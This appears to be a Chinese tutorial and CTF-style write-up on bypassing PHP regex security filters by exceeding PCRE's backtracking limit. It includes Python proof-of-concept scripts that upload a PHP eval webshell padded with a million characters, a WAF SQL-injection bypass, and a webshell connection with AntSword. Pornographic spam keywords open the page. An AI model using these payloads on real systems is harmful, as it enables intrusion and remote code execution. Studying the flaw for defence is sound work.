国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例

這篇具有很好參考價(jià)值的文章主要介紹了PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

一、正則表達(dá)式概述

有限狀態(tài)自動(dòng)機(jī)

匹配輸入的過(guò)程分別是:

DFA(確定性有限狀態(tài)自動(dòng)機(jī))

NFA(非確定性有限狀態(tài)自動(dòng)機(jī))

二、回溯的過(guò)程

三、 PHP 的 pcre.backtrack_limit 限制利用

例題一

回溯繞過(guò)步驟 :

1、運(yùn)行結(jié)果: 可見無(wú)法匹配

2、嘗試匹配:依舊無(wú)法匹配

3、再次嘗試:發(fā)現(xiàn)拿到匹配結(jié)果

原因:

總結(jié):

1、繞過(guò)該正則

例題二

1、利用python語(yǔ)言編寫回溯繞過(guò)一百萬(wàn)次的腳本

回溯過(guò)程模擬:

例題三

文件上傳漏洞

1、編寫文件上傳腳本

2、上傳任意一個(gè)文件

3、正則回溯

編寫回溯腳本

查看并執(zhí)行python代碼是否成功

temp文件出現(xiàn)

使用中國(guó)蟻劍進(jìn)行連接測(cè)試


一、正則表達(dá)式概述

正則表達(dá)式是一個(gè)可以被 “有限狀態(tài)自動(dòng)機(jī)”接受的語(yǔ)言類。

有限狀態(tài)自動(dòng)機(jī)

????????其擁有有限數(shù)量的狀態(tài),每個(gè)狀態(tài)可以遷移到零個(gè)或多個(gè)狀態(tài),輸入字串決定執(zhí)行哪個(gè)狀態(tài)的遷移。

????????而常見的正則引擎,又被細(xì)分為 DFA(確定性有限狀態(tài)自動(dòng)機(jī))與 NFA(非確定性有限狀態(tài)自動(dòng)機(jī))。

匹配輸入的過(guò)程分別是:

DFA(確定性有限狀態(tài)自動(dòng)機(jī))

????????從起始狀態(tài)開始,一個(gè)字符一個(gè)字符地讀取輸入串,并根據(jù)正則來(lái)一步步確定至下一個(gè)轉(zhuǎn)移狀態(tài),直到匹配不上或走完整個(gè)輸入
?

NFA(非確定性有限狀態(tài)自動(dòng)機(jī))

????????從起始狀態(tài)開始,一個(gè)字符一個(gè)字符地讀取輸入串,并與正則表達(dá)式進(jìn)行匹配,如果匹配不上,則進(jìn)行回溯,嘗試其他狀態(tài)

由于 NFA 的執(zhí)行過(guò)程存在回溯,所以其性能會(huì)劣于 DFA,但它支持更多功能。大多數(shù)程序語(yǔ)言都使用了 NFA 作為正則引擎,其中也包括 PHP 使用的 PCRE 庫(kù)。

二、回溯的過(guò)程

<?php
function is_php($data){  
    return preg_match('/<\?.*[(`;?>].*/is', $data);  
}
<?php eval()

if(!is_php($input)) {
    // fwrite($f, $input); ...
}

題目中的正則 <\?.*[(`;?>].*,假設(shè)匹配的輸入是 <?php phpinfo();//aaaaa,實(shí)際執(zhí)行流程是這樣的:

回溯過(guò)程

?????????在第 4 步的時(shí)候,因?yàn)榈谝粋€(gè) .* 可以匹配任何字符,所以最終匹配到了輸入串的結(jié)尾,也就是 //aaaaa。但此時(shí)顯然是不對(duì)的,因?yàn)檎齽t顯示.*后面還應(yīng)該有一個(gè)字符 [(`;?>]。

????????所以 NFA 就開始回溯,先吐出一個(gè) a,輸入變成第 5 步顯示的 //aaaa,但仍然匹配不上正則,繼續(xù)吐出 a,變成 //aaa,仍然匹配不上……

????????最終直到吐出;,輸入變成第 12 步顯示的 <?php phpinfo(),此時(shí) ,.* 匹配的是 php phpinfo(),而后面的 ; 則匹配上 [(`;?>] ,這個(gè)結(jié)果滿足正則表達(dá)式的要求,于是不再回溯。13 步開始向后匹配;,14 步匹配.*,第二個(gè).*匹配到了字符串末尾,最后結(jié)束匹配。

????????在調(diào)試正則表達(dá)式的時(shí)候,我們可以查看當(dāng)前回溯的次數(shù)

三、 PHP 的 pcre.backtrack_limit 限制利用

PHP 為了防止正則表達(dá)式的拒絕服務(wù)攻擊(reDOS),給 pcre 設(shè)定了一個(gè)回溯次數(shù)上限 pcre.backtrack_limit。我們可以通過(guò) var_dump(ini_get('pcre.backtrack_limit'));的方式查看當(dāng)前環(huán)境下的上限:

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

回溯次數(shù)上限默認(rèn)是 100 萬(wàn)

回溯次數(shù)超過(guò)了 100 萬(wàn),返回的非 1 和 0,是 false。

preg_match 返回的非 1 和 0,而是 false。

preg_match 函數(shù)返回 false 表示此次執(zhí)行失敗了,我們可以調(diào)用 var_dump(preg_last_error() === PREG_BACKTRACK_LIMIT_ERROR);,發(fā)現(xiàn)失敗的原因的確是回溯次數(shù)超出了限制

所以,這道題的答案就呼之欲出了。我們通過(guò)發(fā)送超長(zhǎng)字符串的方式,使正則執(zhí)行失敗,最后繞過(guò)目標(biāo)對(duì) PHP 語(yǔ)言的限制。

對(duì)應(yīng)的 POC 如下:

import requests
from io import BytesIO

files = {
  'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000)
}

res = requests.post('http://xx.xx.xx.xx/index.php', files=files, allow_redirects=False)
print(res.headers)

四、PCRE 另一種錯(cuò)誤的用法

基于 PHP 的 WAF:

例一:
<?php
if(preg_match('/SELECT.+FROM.+/is', $input)) {
    die('SQL Injection');
}

均存在上述問(wèn)題,通過(guò)大量回溯可以進(jìn)行繞過(guò)。

例二:
?

<?php
if(preg_match('/UNION.+?SELECT/is', $input)) {
    die('SQL Injection');
}

這里涉及到了正則表達(dá)式的「非貪婪模式」。在 NFA 中,如果我輸入 UNION/*aaaaa*/SELECT,這個(gè)正則表達(dá)式執(zhí)行流程如下:

.+? 匹配到/

因?yàn)榉秦澙纺J?,所?+? 停止匹配,而由 S 匹配*

S 匹配*失敗,回溯,再由.+? 匹配*

因?yàn)榉秦澙纺J?,所?+? 停止匹配,而由 S 匹配 a

S 匹配 a 失敗,回溯,再由.+? 匹配 a

...

?回溯次數(shù)隨著 a 的數(shù)量增加而增加。所以,我們?nèi)匀豢梢酝ㄟ^(guò)發(fā)送大量 a,來(lái)使回溯次數(shù)超出 pcre.backtrack_limit 限制,進(jìn)而繞過(guò) WAF:

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

例題一

<?php
// greeting[]=Merry Christmas&greeting[]=123
function areyouok($greeting){
    return preg_match('/Merry.*Christmas/is',$greeting); //正則匹配
}
// greeting[]=123
// $greeting=@$_POST['greeting'];

if(!areyouok($greeting)){
    // NULL != false
    // Null !== false
    // null !== false
    // strpos
    if(strpos($greeting,'Merry Christmas') !== false){   //字符查找,如果查找到返回字符的位置,沒(méi)有就返回false
        echo 'welcome to nanhang. '.'flag{i_Lov3_NanHang_everyThing}';
    }else{
        echo 'Do you know .swp file?';
    }
}else{
    echo 'Do you know PHP?';
}

回溯繞過(guò)步驟 :

1、運(yùn)行結(jié)果: 可見無(wú)法匹配

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

2、嘗試匹配:依舊無(wú)法匹配

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

3、再次嘗試:發(fā)現(xiàn)拿到匹配結(jié)果

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

原因:

此時(shí)greeting傳遞的是數(shù)組,元素是123,而 strpos驗(yàn)證的是字符串

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

由上可見:在strpos這個(gè)對(duì)字符串處理的函數(shù)中傳遞數(shù)組,那么它將會(huì)返回一個(gè)NULL

將strpos返回的值NULL與 null !== false 進(jìn)行對(duì)比,如果為真,則進(jìn)行下去,為假則結(jié)束。

當(dāng)只有一個(gè) = bool(false),返回值為false,程序執(zhí)行結(jié)束???

<?php
var_dump(NULL != false);
?>

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

當(dāng)有兩個(gè) == 時(shí),返回值為true,程序繼續(xù)執(zhí)行

<?php
var_dump(NULL !== false);
?>

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

知識(shí)點(diǎn)補(bǔ)充:

PHP中 比較 0、false、null,'' "

松散比較:使用兩個(gè)等號(hào) == 比較,只比較值,不比較類型。 嚴(yán)格比較:用三個(gè)等號(hào) === 比較,除了比較值,也比較類型。 == 在進(jìn)行比較的時(shí)候,會(huì)先將字符串類型轉(zhuǎn)化成相同,再比較

0 == false: bool(true)
0 === false: bool(false)

0 == null: bool(true)
0 === null: bool(false)

false == null: bool(true)
false === null: bool(false)

"0" == false: bool(true)
"0" === false: bool(false)

"0" == null: bool(false)
"0" === null: bool(false)

"" == false: bool(true)
"" === false: bool(false)

"" == null: bool(true)
"" === null: bool(false)

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

總結(jié):

1、繞過(guò)該正則

插入代碼:

greeting[]=123;

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

?此時(shí)繞過(guò)第一個(gè)正則

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

接著會(huì)返回

 ?null !== false;

根據(jù)嚴(yán)格不相等原則,此時(shí)返回結(jié)果是true,因此,代碼將會(huì)繼續(xù)執(zhí)行

例題二

<?php
function areyouok($greeting){
 ? ?return preg_match('/Merry.*Christmas/is',$greeting);
}
?
// 回溯的問(wèn)題
$greeting=@$_POST['greeting'];
if(!is_array($greeting)){
 ? ?if(!areyouok($greeting)){
 ? ? ? ?// strpos string postion
 ? ? ? ?if(strpos($greeting,'Merry Christmas') !== false){
 ? ? ? ? ? ?echo 'Merry Christmas. '.'flag{i_Lov3_NanHang_everyThing}';
 ? ? ?  }else{
 ? ? ? ? ? ?echo 'Do you know .swp file?';
 ? ? ?  }
 ?  }else{
 ? ? ? ?echo 'Do you know PHP?';
 ?  }
} else {
 ? ?echo 'fuck array!!!';
}
?>
?
?

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

思路: 只要將if(!areyouok($greeting))為假,并且含有‘Merry Christmas’字符,回溯一百萬(wàn)次即可繞過(guò)

1、利用python語(yǔ)言編寫回溯繞過(guò)一百萬(wàn)次的腳本

from requests import post 

payload = {
    'greeting' : 'Merry Christmas' + 'a' * 1000001
}

url = 'http://127.0.0.1/xss_location/dem04.php'

res = post(url ,data=payload)

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

回溯超過(guò)一百萬(wàn)次后,繞過(guò)正則,此時(shí)if(!areyouok($greeting))為假,可見最終打印出'Merry Christmas',由此可見繞過(guò)完成

回溯過(guò)程模擬:

正則回溯實(shí)例

例題三

文件上傳漏洞

<?php
function is_php($data){ 
 ? ?return preg_match('/<\?.*[(`;?>].*/is', $data);
}
?
if(empty($_FILES)) {
 ? ?die(show_source(__FILE__));
}
?
$user_dir = md5($_SERVER['REMOTE_ADDR']); 
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) { 
 ? ?exit("bad request");
} else {
 ? ?@mkdir($user_dir, 0755); 
 ? ?$path = $user_dir . '/' . 'oupeng.php'; 
 ? ?//利用move_uploaded_file將臨時(shí)文件,復(fù)制到$path
 ? ?move_uploaded_file($_FILES['file']['tmp_name'], $path);
?
 ? ?header("Location: $path", true, 303); 
} 
?>

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

1、編寫文件上傳腳本

<?php
echo "<pre>";  //設(shè)置輸出為格式化輸出
var_dump($_FILES);
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Xss-filter</title>
</head>
<body>
    <form action="./file_upload.php" method="post" enctype="multipart/form-data">
        <input type="file" name="file" id="">
        <input type="submit" value="submit">
    </form> 
</body>
</html>

2、上傳任意一個(gè)文件

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

?PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

注:php上傳文件時(shí)會(huì)生成一個(gè)臨時(shí)文件,當(dāng)文件上傳完成時(shí)該臨時(shí)文件將會(huì)自動(dòng)刪除

可以通過(guò)設(shè)置睡眠時(shí)間來(lái)將臨時(shí)文件tmp抓到

<?php
sleep(100);
echo "<pre>";  //設(shè)置輸出為格式化輸出
var_dump($_FILES);

3、正則回溯

編寫回溯腳本

from requests import post 

files = {
    'file' : r'<?php eval($_POST[123]);//' + r'a' * 1000000
}

url = 'http://127.0.0.1/xss_location/demo6.php'

res = post(url ,files=files, allow_redirects=False)

print (res.headers)

查看并執(zhí)行python代碼是否成功

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

temp文件出現(xiàn)

此時(shí),一句話木馬已經(jīng)寫入

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

使用中國(guó)蟻劍進(jìn)行連接測(cè)試

PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例,網(wǎng)絡(luò)滲透防御,php,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全

?連接成功,此時(shí)已經(jīng)繞過(guò)漏洞。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-649323.html

到了這里,關(guān)于PHP利用PCRE回溯次數(shù)限制繞過(guò)某些安全限制實(shí)戰(zhàn)案例的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • win11出現(xiàn)安全中心空白和IT管理員已限制對(duì)某些區(qū)域的訪問(wèn)(不一樣的解決方式),真實(shí)的個(gè)人經(jīng)歷,并且解決經(jīng)過(guò)

    win11出現(xiàn)安全中心空白和IT管理員已限制對(duì)某些區(qū)域的訪問(wèn)(不一樣的解決方式),真實(shí)的個(gè)人經(jīng)歷,并且解決經(jīng)過(guò)

    2023年12月22日,由于我買了一塊電腦的固態(tài)硬盤1T,想要擴(kuò)容,原來(lái)電腦自帶512G(由于個(gè)人是一個(gè)程序員,導(dǎo)致512G實(shí)在太古雞肋)裝好以后,想要重裝一下系統(tǒng),來(lái)個(gè)大清理。結(jié)果不出意料,和廣大水友預(yù)料的那樣,出來(lái)一堆的問(wèn)題,我解決的問(wèn)題實(shí)在是坎坷(因?yàn)檫@個(gè)過(guò)程長(zhǎng)

    2024年02月03日
    瀏覽(28)
  • 黑客可利用 Windows 容器隔離框架繞過(guò)端點(diǎn)安全系統(tǒng)

    黑客可利用 Windows 容器隔離框架繞過(guò)端點(diǎn)安全系統(tǒng)

    新的研究結(jié)果表明,攻擊者可以利用一種隱匿的惡意軟件檢測(cè)規(guī)避技術(shù),并通過(guò)操縱 Windows 容器隔離框架來(lái)繞過(guò)端點(diǎn)安全的解決方案。 Deep Instinct安全研究員丹尼爾-阿維諾姆(Daniel Avinoam)在本月初舉行的DEF CON安全大會(huì)上公布了這一發(fā)現(xiàn)。 Microsoft的容器體系結(jié)構(gòu)(以及擴(kuò)展的

    2024年02月09日
    瀏覽(19)
  • Angular安全專輯之三:授權(quán)繞過(guò),利用漏洞控制管理員賬戶

    Angular安全專輯之三:授權(quán)繞過(guò),利用漏洞控制管理員賬戶

    這篇文章是針對(duì)實(shí)際項(xiàng)目中所出現(xiàn)的問(wèn)題所做的一個(gè)總結(jié)。簡(jiǎn)單來(lái)說(shuō),就是授權(quán)繞過(guò)問(wèn)題,管理員帳戶被錯(cuò)誤的接管。 詳細(xì)情況是這樣的,我們的項(xiàng)目中通常都會(huì)有 用戶身份驗(yàn)證功能 ,不同的用戶擁有不同的權(quán)限。相對(duì)來(lái)說(shuō)管理員賬戶所對(duì)應(yīng)的權(quán)限是極高的,它可以修改當(dāng)

    2024年02月11日
    瀏覽(22)
  • 第27天:安全開發(fā)-PHP應(yīng)用&TP框架&路由訪問(wèn)&對(duì)象操作&內(nèi)置過(guò)濾繞過(guò)&核心漏洞

    第27天:安全開發(fā)-PHP應(yīng)用&TP框架&路由訪問(wèn)&對(duì)象操作&內(nèi)置過(guò)濾繞過(guò)&核心漏洞

    1.TP框架-開發(fā)-配置架構(gòu)路由MVC模型 參考:https://www.kancloud.cn/manual/thinkphp5_1 配置架構(gòu)-導(dǎo)入使用 路由訪問(wèn)-URL訪問(wèn) 數(shù)據(jù)庫(kù)操作-應(yīng)用對(duì)象 文件上傳操作-應(yīng)用對(duì)象 前端頁(yè)面渲染-MVC模型 1.TP框架-安全-不安全寫法版本過(guò)濾繞過(guò) 1.內(nèi)置代碼寫法 不合要求的代碼寫法-ThinkPHP5-自寫 2.框架

    2024年04月25日
    瀏覽(30)
  • win11永久關(guān)閉實(shí)時(shí)保護(hù)(新的解決方法)/win11出現(xiàn)安全中心空白和IT管理員已限制對(duì)某些區(qū)域的訪問(wèn)(通過(guò)本地組策略器永久關(guān)閉Windows Defender實(shí)時(shí)保護(hù))

    win11永久關(guān)閉實(shí)時(shí)保護(hù)(新的解決方法)/win11出現(xiàn)安全中心空白和IT管理員已限制對(duì)某些區(qū)域的訪問(wèn)(通過(guò)本地組策略器永久關(guān)閉Windows Defender實(shí)時(shí)保護(hù))

    方法一:系統(tǒng)保護(hù)本地磁盤窗口中,點(diǎn)擊【禁用系統(tǒng)保護(hù)】 Win11系統(tǒng)自帶實(shí)時(shí)保護(hù)功能,但是有些小伙伴覺得這個(gè)功能影響了一些正常操作,有什么辦法可以關(guān)閉Win11實(shí)時(shí)保護(hù)功能嗎?下面小編就給大家分享一個(gè)永久關(guān)閉實(shí)時(shí)保護(hù)的方法。 純凈之家-win7純凈版系統(tǒng)_win7 ghost 純

    2024年03月17日
    瀏覽(37)
  • nginx 限制訪問(wèn)某些url

    在Nginx中可以通過(guò)配置限制訪問(wèn)某些URL,以下是一些實(shí)現(xiàn)方法: 使用location指令進(jìn)行限制 可以使用location指令在Nginx的配置文件中指定某個(gè)URL的訪問(wèn)權(quán)限,例如: 上述指令會(huì)禁止所有用戶訪問(wèn)/restricted路徑下的所有內(nèi)容。 使用if指令進(jìn)行限制 如果需要更復(fù)雜的限制條件,可以

    2024年02月12日
    瀏覽(22)
  • 使用cgroup工具對(duì)服務(wù)器某些/全部用戶進(jìn)行計(jì)算資源限制

    使用cgroup工具對(duì)服務(wù)器某些/全部用戶進(jìn)行計(jì)算資源限制

    主要介紹,如何對(duì)指定/所有用戶進(jìn)行資源限定(這里主要介紹cpu和內(nèi)存占用限制),防止某些用戶大量占用服務(wù)器計(jì)算資源,影響和擠占他人正常使用服務(wù)器。 安裝 cgroup 管理工具 使用 mount -t cgroup 命令檢查驗(yàn)證 可以通過(guò)編寫 /etc/cgconfig.conf 和 /etc/cgrules.conf 文件進(jìn)行計(jì)算資

    2024年02月10日
    瀏覽(28)
  • New Bing相關(guān)設(shè)置與解除聊天次數(shù)限制

    New Bing相關(guān)設(shè)置與解除聊天次數(shù)限制

    最近ChatGPT相關(guān)的話題很多。之前使用了一下,感覺雖然功能很強(qiáng)大,但是ChatGPT只能查找2021年之前的信息,并且會(huì)編造一些虛假信息。例如讓其給出一些信息的來(lái)源的時(shí)候,就會(huì)胡亂編造。 New Bing是ChatGPT的升級(jí)版,集成了ChatGPT,同時(shí)還支持實(shí)時(shí)網(wǎng)絡(luò)查詢,能夠?yàn)橛脩籼峁└?/p>

    2023年04月14日
    瀏覽(22)
  • Java接口訪問(wèn)限制次數(shù)(使用IP作為唯一標(biāo)識(shí))

    1、獲取用戶IP工具類 2、接口限制注解(切面) (1)controller層 (2)注解類 (3)切面方法

    2024年02月13日
    瀏覽(18)
  • shiro的payload長(zhǎng)度限制繞過(guò)

    shiro的payload長(zhǎng)度限制繞過(guò)

    yishiro反序列化漏洞常規(guī)利用點(diǎn)在數(shù)據(jù)包的header頭中,在這里直接插入目標(biāo)代碼,生成的payload是很長(zhǎng)的,肯定會(huì)超過(guò)中間件 header 長(zhǎng)度限制,如何解決這個(gè)問(wèn)題呢? 主要繞過(guò)的方式有以下幾種: 1.從外部或從 HTTP 請(qǐng)求 body 中加載類字節(jié)碼,header頭中的payload僅僅實(shí)現(xiàn)讀取和加載

    2024年02月16日
    瀏覽(74)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包